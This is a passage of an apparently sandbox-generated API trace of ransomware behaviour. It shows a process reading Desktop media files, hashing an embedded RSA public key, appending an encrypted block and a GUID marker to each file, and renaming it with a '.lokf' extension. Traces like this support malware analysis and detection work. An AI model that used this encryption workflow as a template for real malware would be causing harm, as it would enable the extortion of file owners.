ftCreationTime.dwLowDateTime=0x78546840, ftCreationTime.dwHighDateTime=0x1d4c855, ftLastAccessTime.dwLowDateTime=0xc6db8660, ftLastAccessTime.dwHighDateTime=0x1d4d3f9, ftLastWriteTime.dwLowDateTime=0xc6db8660, ftLastWriteTime.dwHighDateTime=0x1d4d3f9, nFileSizeHigh=0x0, nFileSizeLow=0x833c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RrXB-.m4a", cAlternateFileName="")) returned 1 [0058.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.695] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.695] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RrXB-.m4a") returned=".m4a" [0058.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RrXB-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rrxb-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.695] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=33596) returned 1 [0058.695] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.697] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x8316, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.697] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.697] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.697] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x833c, lpOverlapped=0x0) returned 1 [0058.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.698] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.698] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.698] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.698] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.698] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.699] GetLastError () returned 0x0 [0058.699] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.699] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.699] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.699] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.699] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.699] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.699] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x833c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.699] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.699] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.699] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.700] CloseHandle (hObject=0x5cc) returned 1 [0058.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.700] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RrXB-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rrxb-.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RrXB-.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rrxb-.m4a.lokf")) returned 1 [0058.701] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeca1840, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x6ffe2130, ftLastAccessTime.dwHighDateTime=0x1d4d0e9, ftLastWriteTime.dwLowDateTime=0x6ffe2130, ftLastWriteTime.dwHighDateTime=0x1d4d0e9, nFileSizeHigh=0x0, nFileSizeLow=0x16786, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SbEH25_9Y82gEZUNcsj.flv", cAlternateFileName="SBEH25~1.FLV")) returned 1 [0058.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.702] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.702] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SbEH25_9Y82gEZUNcsj.flv") returned=".flv" [0058.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SbEH25_9Y82gEZUNcsj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sbeh25_9y82gezuncsj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.702] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=92038) returned 1 [0058.702] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.703] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.703] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.704] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.704] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x16786, lpOverlapped=0x0) returned 1 [0058.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.705] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.705] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.705] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.705] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.705] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.705] GetLastError () returned 0x0 [0058.705] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.705] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.706] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.706] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.706] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.706] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.706] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16786, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.706] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.707] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.707] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.707] CloseHandle (hObject=0x5cc) returned 1 [0058.708] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.708] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.708] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SbEH25_9Y82gEZUNcsj.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sbeh25_9y82gezuncsj.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SbEH25_9Y82gEZUNcsj.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sbeh25_9y82gezuncsj.flv.lokf")) returned 1 [0058.709] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe204e7f0, ftCreationTime.dwHighDateTime=0x1d4c568, ftLastAccessTime.dwLowDateTime=0x7121a170, ftLastAccessTime.dwHighDateTime=0x1d4d43d, ftLastWriteTime.dwLowDateTime=0x7121a170, ftLastWriteTime.dwHighDateTime=0x1d4d43d, nFileSizeHigh=0x0, nFileSizeLow=0x1ad3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SzTS.pps", cAlternateFileName="")) returned 1 [0058.709] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.709] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.709] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SzTS.pps") returned=".pps" [0058.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SzTS.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szts.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.709] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=6867) returned 1 [0058.709] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.711] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1aad, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.711] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.712] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1ad3, lpOverlapped=0x0) returned 1 [0058.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.712] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.712] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.712] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.713] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.713] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.713] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.713] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.713] GetLastError () returned 0x0 [0058.713] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.713] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.713] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.713] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.713] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.713] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.713] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.713] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1ad3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.713] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.714] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.714] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.714] CloseHandle (hObject=0x5cc) returned 1 [0058.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.714] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.714] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SzTS.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szts.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SzTS.pps.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\szts.pps.lokf")) returned 1 [0058.715] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f7c60, ftCreationTime.dwHighDateTime=0x1d4cd21, ftLastAccessTime.dwLowDateTime=0x34f8fc90, ftLastAccessTime.dwHighDateTime=0x1d4c6da, ftLastWriteTime.dwLowDateTime=0x34f8fc90, ftLastWriteTime.dwHighDateTime=0x1d4c6da, nFileSizeHigh=0x0, nFileSizeLow=0x11d98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7Qf8.mp4", cAlternateFileName="")) returned 1 [0058.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.716] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.716] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U7Qf8.mp4") returned=".mp4" [0058.716] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U7Qf8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u7qf8.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.716] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=73112) returned 1 [0058.716] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.717] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11d72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.717] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.718] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.718] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x11d98, 